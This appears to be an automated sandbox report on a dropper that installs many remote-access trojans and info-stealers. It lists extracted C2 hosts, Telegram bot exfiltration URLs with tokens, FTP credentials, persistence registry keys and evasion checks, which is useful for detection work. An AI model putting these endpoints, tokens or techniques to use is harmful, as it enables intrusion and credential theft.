asyncrat | 6b81b36622febc198dbe4596349b7b781cd6b278e9db9145a2de8b14b045e128

Resubmissions

09/02/2025, 17:26

250209-vzvbzaxpck 10

09/02/2025, 17:22

09/02/2025, 16:34

09/02/2025, 16:32

27/01/2025, 22:33

27/01/2025, 22:28

27/01/2025, 22:21

Analysis

max time kernel
117s
max time network
1802s
platform
windows11-21h2_x64
resource
win11-20250207-en
resource tags

arch:x64arch:x86image:win11-20250207-enlocale:en-usos:windows11-21h2-x64system
submitted
09/02/2025, 17:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.exe
Size

4KB
MD5

a239a27c2169af388d4f5be6b52f272c
SHA1

0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512

f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP

48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
206.221.187.3
Port:
21
Username:
user

Extracted

Credentials

Protocol: ftp
Host:
115.71.27.6
Port:
21
Username:
user
Password:
Forward

Extracted

Credentials

Protocol: ftp
Host:
24.232.178.12
Port:
21
Username:
admin
Password:
monkey

Extracted

Credentials

Protocol: ftp
Host:
91.184.50.12
Port:
21
Username:
ftp
Password:
11111

Extracted

Credentials

Protocol: ftp
Host:
109.74.11.15
Port:
21
Username:
root
Password:
sunshine

Extracted

Credentials

Protocol: ftp
Host:
216.92.145.26
Port:
21
Username:
root
Password:
W1NDOWS

Extracted

Credentials

Protocol: ftp
Host:
76.80.174.42
Port:
21
Username:
user
Password:
159753

Extracted

Credentials

Protocol: ftp
Host:
200.234.217.46
Port:
21
Username:
user
Password:
123456

Extracted

Credentials

Protocol: ftp
Host:
154.92.97.59
Port:
21
Username:
user
Password:
GO2WORK

Extracted

Credentials

Protocol: ftp
Host:
143.125.250.86
Port:
21
Username:
user
Password:
qwerty123

Extracted

Credentials

Protocol: ftp
Host:
104.168.98.103
Port:
21
Username:
administrator
Password:
killer

Extracted

Credentials

Protocol: ftp
Host:
156.242.129.107
Port:
21
Username:
administrator
Password:
555555

Extracted

Credentials

Protocol: ftp
Host:
185.65.245.109
Port:
21
Username:
user
Password:
cisco

Extracted

Credentials

Protocol: ftp
Host:
43.233.247.111
Port:
21
Username:
admin
Password:
P@SSW0RD

Extracted

Family

phemedrone

https://api.telegram.org/bot7602843389:AAE9dcCKuyUGx9HUNQf9KbsZDhME6HwC10g/sendMessage?chat_id=1745421249

Extracted

Family

xworm

127.0.0.1:2727

dnsdeerrorlehaxor.ddns.net:2727

Attributes

Install_directory
%Public%
install_file
Discord.exe
telegram
https://api.telegram.org/bot5964175002:AAFK1mpStrMUWwegniLJuryZjOhVavZhSGo/sendMessage?chat_id=1745421249

Extracted

Family

azorult

http://anastaf4.beget.tech

Extracted

Family

xworm

Version

5.0

157.20.182.169:1515

Mutex

qqWjm3mbt3teI8Oz

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

vidar

https://t.me/sok33tn

https://steamcommunity.com/profiles/76561199824159981

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0

Extracted

Family

quasar

Version

1.4.1

Botnet

githubyt

87.228.57.81:4782

Mutex

cf3988ab-2fd9-4544-a16f-9faa71eb5bac

Attributes

encryption_key
19A0FAF8459F69650B5965C225752D425C429EEC
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svchoost.exe
subdirectory
SubDir

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

test

otrodia8912.gleeze.com:3333

Mutex

123

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

njrat

Version

Njrat 0.7 Golden By Hassan Amiri

Botnet

HacKed

82.193.104.21:5137

Mutex

Windows Update

Attributes

reg_key
Windows Update
splitter
|Hassan|

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

0.tcp.in.ngrok.io:18220

Mutex

HyFTucy74RnH

Attributes

delay
3
install
true
install_file
Discord.exe
install_folder
%AppData%

aes.plain

Extracted

Family

redline

Botnet

Wipe

91.219.236.248:1912

Extracted

Family

gurcu

https://api.telegram.org/bot5964175002:AAFK1mpStrMUWwegniLJuryZjOhVavZhSGo/sendMessage?chat_id=1745421249

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult

Detect Vidar Stealer 8 IoCs

stealer

resource	yara_rule
behavioral1/memory/3964-2235-0x0000000000400000-0x000000000085E000-memory.dmp	family_vidar_v7
behavioral1/files/0x002000000002b216-4954.dat	family_vidar_v7
behavioral1/memory/7756-4992-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/224-5046-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/3964-5563-0x0000000000400000-0x000000000085E000-memory.dmp	family_vidar_v7
behavioral1/memory/7756-5758-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/224-5773-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/224-6083-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/files/0x001900000002b1b8-2285.dat	family_xworm
behavioral1/memory/6008-2310-0x0000000000110000-0x000000000016C000-memory.dmp	family_xworm
behavioral1/files/0x001a00000002b211-3367.dat	family_xworm
behavioral1/memory/6348-4396-0x0000000000610000-0x0000000000620000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore
Njrat family
njrat
Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x002000000002b213-5030.dat	family_quasar
behavioral1/memory/5864-5039-0x0000000000E10000-0x0000000001134000-memory.dmp	family_quasar

Ramnit
Ramnit is a versatile family that holds viruses, worms, and Trojans.
trojan spyware stealer worm banker ramnit
Ramnit family
ramnit
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001b00000002b259-5373.dat	family_redline
behavioral1/memory/6516-5388-0x00000000002A0000-0x00000000002F2000-memory.dmp	family_redline

Redline family
redline
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 3 IoCs

rat

resource	yara_rule
behavioral1/files/0x001900000002b269-5052.dat	family_asyncrat
behavioral1/files/0x001a00000002b273-5106.dat	family_asyncrat
behavioral1/files/0x001900000002b279-5121.dat	family_asyncrat

Contacts a large (10727) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Bjkm5hE.exe

Blocklisted process makes network request 18 IoCs

flow	pid	Process
196	5244	BitLockerToGo.exe
457	5244	BitLockerToGo.exe
459	5244	BitLockerToGo.exe
471	5244	BitLockerToGo.exe
612	5244	BitLockerToGo.exe
659	5244	BitLockerToGo.exe
673	5244	BitLockerToGo.exe
686	5244	BitLockerToGo.exe
811	7792	chrome.exe
827	7792	chrome.exe
849	7792	chrome.exe
850	7792	chrome.exe
851	7792	chrome.exe
863	5244	BitLockerToGo.exe
865	5244	BitLockerToGo.exe
876	5244	BitLockerToGo.exe
882	5244	BitLockerToGo.exe
938	5244	BitLockerToGo.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3580	powershell.exe
2624	powershell.exe
5268	powershell.exe
5716	powershell.exe

Disables Task Manager via registry modification
defense_evasion

Downloads MZ/PE file 29 IoCs

flow	pid	Process
127	3320	New Text Document.exe
127	3320	New Text Document.exe
127	3320	New Text Document.exe
127	3320	New Text Document.exe
127	3320	New Text Document.exe
137	3320	New Text Document.exe
5	3320	New Text Document.exe
43	3320	New Text Document.exe
67	3320	New Text Document.exe
141	3320	New Text Document.exe
201	8052	svc.exe
201	8052	svc.exe
52	3320	New Text Document.exe
136	5564	laserrr.exe
688	3320	New Text Document.exe
693	3320	New Text Document.exe
108	3320	New Text Document.exe
458	3320	New Text Document.exe
873	6244	InstallSetup.exe
24	3320	New Text Document.exe
49	3320	New Text Document.exe
20	3320	New Text Document.exe
21	3320	New Text Document.exe
29	3320	New Text Document.exe
56	3320	New Text Document.exe
110	3360	Explorer.EXE
181	3320	New Text Document.exe
470	3320	New Text Document.exe
672	3320	New Text Document.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 20 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
7380	net.exe
3400	net.exe
8168	net.exe
2300	net.exe
7176	net.exe
5296	net.exe
3912	cmd.exe
7504	net.exe
5528	net.exe
7640	net.exe
6764	net.exe
7940	net.exe
3396	net.exe
5332	Process not Found
4216	Process not Found
4824	cmd.exe
8184	cmd.exe
648	net.exe
5664	net.exe
4324	net.exe

Modifies Windows Firewall 2 TTPs 6 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5804	netsh.exe
4240	netsh.exe
6128	netsh.exe
4728	netsh.exe
5676	netsh.exe
3116	netsh.exe

Uses browser remote debugging 2 TTPs 33 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3540	chrome.exe
7896	msedge.exe
2092	chrome.exe
5312	msedge.exe
4872	chrome.exe
5684	chrome.exe
7532	msedge.exe
7520	chrome.exe
1388	msedge.exe
7932	msedge.exe
7120	chrome.exe
2624	chrome.exe
7296	chrome.exe
6824	msedge.exe
5876	msedge.exe
5348	chrome.exe
6060	chrome.exe
5816	msedge.exe
7084	msedge.exe
7832	chrome.exe
7404	chrome.exe
5984	msedge.exe
6200	msedge.exe
5520	chrome.exe
8080	msedge.exe
5300	chrome.exe
7176	msedge.exe
5128	msedge.exe
5616	msedge.exe
3216	chrome.exe
4560	chrome.exe
7852	msedge.exe
8124	chrome.exe

.NET Reactor proctector 4 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x001900000002b184-7.dat	net_reactor
behavioral1/memory/2136-15-0x0000000000200000-0x00000000002E0000-memory.dmp	net_reactor
behavioral1/files/0x001900000002b248-4851.dat	net_reactor
behavioral1/memory/7836-4859-0x0000000000F50000-0x0000000000F70000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Bjkm5hE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Bjkm5hE.exe

Drops startup file 11 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\422eaa97c415f834e53f120f3eb1c490.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	winX32.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\422eaa97c415f834e53f120f3eb1c490.exe	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	winX32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	Update.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	Update.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Security Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Security Update.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk	IMG001.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	winX32.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe	winX32.exe

Executes dropped EXE 64 IoCs

pid	Process
2136	g.exe
4340	g.exe
2132	g.exe
3000	lem.exe
2800	StCl.exe
5668	untitled2.exe
1960	random.exe
3964	Bjkm5hE.exe
4516	silk.exe
5236	silk.tmp
6136	olddataeraser19.exe
3144	IMG001.exe
5208	z.exe
5216	steam.exe
6008	Discord.exe
4260	Steam.exe
6084	bitcoin3000.exe
904	savedecrypter.exe
1596	Update.exe
6024	cann.exe
2432	WindowsServices.exe
5676	tftp.exe
5628	Update.exe
5620	WindowsServices.exe
5420	IMG001.exe
5888	bin2.exe
4848	bin2Srv.exe
2792	cHSzTDjVl.exe
1668	ServerX.exe
5660	LinkedinTuVanDat.exe
5488	server.exe
5380	tftp.exe
376	CA97.tmp.exe
3604	CA97.tmp.exe
992	cpuminer-avx.exe
4280	sas.exe
5820	giania.exe
5800	code.exe
5564	laserrr.exe
5624	pure.exe
6348	GRAW.exe
8052	svc.exe
8084	RegAAsm.exe
6092	laser.exe
7836	client2.exe
6964	client2.exe
5036	client2.exe
5956	client2.exe
7536	client.exe
6968	client.exe
6416	client.exe
7288	svc1.exe
7556	svc1.exe
8016	svc1.exe
8172	svc1.exe
6232	fusca%20game.exe
6532	svchost.exe
7756	jrirkfiweid.exe
8	temp_22197.exe
7040	temp_22197.exe
6716	temp_22207.exe
6260	temp_22213.exe
5864	filfin1.exe
224	cjrimgid.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Wine	Bjkm5hE.exe

Loads dropped DLL 21 IoCs

pid	Process
5236	silk.tmp
6136	olddataeraser19.exe
3604	CA97.tmp.exe
3604	CA97.tmp.exe
3604	CA97.tmp.exe
3604	CA97.tmp.exe
3604	CA97.tmp.exe
992	cpuminer-avx.exe
992	cpuminer-avx.exe
992	cpuminer-avx.exe
7040	temp_22197.exe
7040	temp_22197.exe
7040	temp_22197.exe
7040	temp_22197.exe
7040	temp_22197.exe
5756	zx.exe
5756	zx.exe
5756	zx.exe
5756	zx.exe
5756	zx.exe
5420	IMG001.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 31 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	Update.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	WindowsServices.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe"	Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\ProgramData\\Winsrv\\winsvc.exe"	temp_22207.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\422eaa97c415f834e53f120f3eb1c490 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\cadaeeeaaeebadbc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\z.exe\""	Explorer.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\220fe34d4dcc4a99fe35d2fb7ce78939 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\fusca%20game.exe\" .."	fusca%20game.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\422eaa97c415f834e53f120f3eb1c490 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\Discord = "C:\\Users\\Public\\Discord.exe"	Discord.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	winX32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	winX32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	WindowsServices.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	Update.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe"	Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\220fe34d4dcc4a99fe35d2fb7ce78939 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\fusca%20game.exe\" .."	fusca%20game.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	winX32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_22207.exe"	temp_22207.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\Server.exe\" .."	Server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\winX32.exe"	winX32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\cadaeeeaaeebadbc = "\"C:\\ProgramData\\cadaeeeaaeebadbc.exe\""	z.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	bitcoin3000.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UDP Monitor = "C:\\Program Files (x86)\\UDP Monitor\\udpmon.exe"	savedecrypter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Update.exe\" .."	Update.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL"	winX32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UDP Monitor = "C:\\Program Files (x86)\\UDP Monitor\\udpmon.exe"	discord.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	Update.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\Server.exe\" .."	Server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\cadaeeeaaeebadbc = "\"C:\\ProgramData\\cadaeeeaaeebadbc.exe\""	Explorer.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Update.exe\" .."	Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1113119086-3642147062-910976179-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	IMG001.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	savedecrypter.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	discord.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	IMG001.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 31 IoCs

Web Service

T1102

flow	ioc
655	0.tcp.in.ngrok.io
4740	0.tcp.in.ngrok.io
12664	0.tcp.in.ngrok.io
10005	0.tcp.in.ngrok.io
59	raw.githubusercontent.com
3685	0.tcp.in.ngrok.io
5399	0.tcp.in.ngrok.io
9375	0.tcp.in.ngrok.io
13318	0.tcp.in.ngrok.io
15133	0.tcp.in.ngrok.io
1625	0.tcp.in.ngrok.io
4625	0.tcp.in.ngrok.io
6040	0.tcp.in.ngrok.io
17547	0.tcp.in.ngrok.io
2414	0.tcp.in.ngrok.io
5576	0.tcp.in.ngrok.io
15725	0.tcp.in.ngrok.io
11341	0.tcp.in.ngrok.io
16380	0.tcp.in.ngrok.io
3844	0.tcp.in.ngrok.io
7348	0.tcp.in.ngrok.io
10674	0.tcp.in.ngrok.io
6770	0.tcp.in.ngrok.io
8030	0.tcp.in.ngrok.io
18757	0.tcp.in.ngrok.io
16939	0.tcp.in.ngrok.io
57	raw.githubusercontent.com
3243	0.tcp.in.ngrok.io
8599	0.tcp.in.ngrok.io
2605	0.tcp.in.ngrok.io
14615	0.tcp.in.ngrok.io

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
69	ip-api.com

Network Service Discovery 1 TTPs 6 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2204	ARP.EXE
5648	cmd.exe
2460	ARP.EXE
7216	cmd.exe
3608	ARP.EXE
8084	cmd.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1328	powercfg.exe
1172	powercfg.exe
4028	powercfg.exe
480	cmd.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x001d00000002b1bf-2363.dat	autoit_exe

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	svchost.exe
File opened for modification	C:\autorun.inf	svchost.exe
File created	D:\autorun.inf	svchost.exe
File created	F:\autorun.inf	svchost.exe
File opened for modification	F:\autorun.inf	svchost.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Notepadx.exe.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Notepadx.exe.exe	server.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1960	random.exe
3964	Bjkm5hE.exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 2136 set thread context of 4340	2136	g.exe	90
PID 2136 set thread context of 2132	2136	g.exe	91
PID 6024 set thread context of 1604	6024	cann.exe	135
PID 3000 set thread context of 5244	3000	lem.exe	176
PID 7836 set thread context of 5036	7836	client2.exe	214
PID 7836 set thread context of 5956	7836	client2.exe	215
PID 7536 set thread context of 6968	7536	client.exe	622
PID 7536 set thread context of 6416	7536	client.exe	219
PID 7288 set thread context of 7556	7288	svc1.exe	224
PID 7288 set thread context of 8172	7288	svc1.exe	226

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4848-2503-0x0000000000400000-0x000000000042E000-memory.dmp	upx

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\UDP Monitor\udpmon.exe	savedecrypter.exe
File opened for modification	C:\Program Files (x86)\UDP Monitor\udpmon.exe	savedecrypter.exe
File created	C:\Program Files (x86)\UDP Monitor\udpmon.exe	discord.exe
File opened for modification	C:\Program Files (x86)\UDP Monitor\udpmon.exe	discord.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WindowsServices.exe	WindowsServices.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
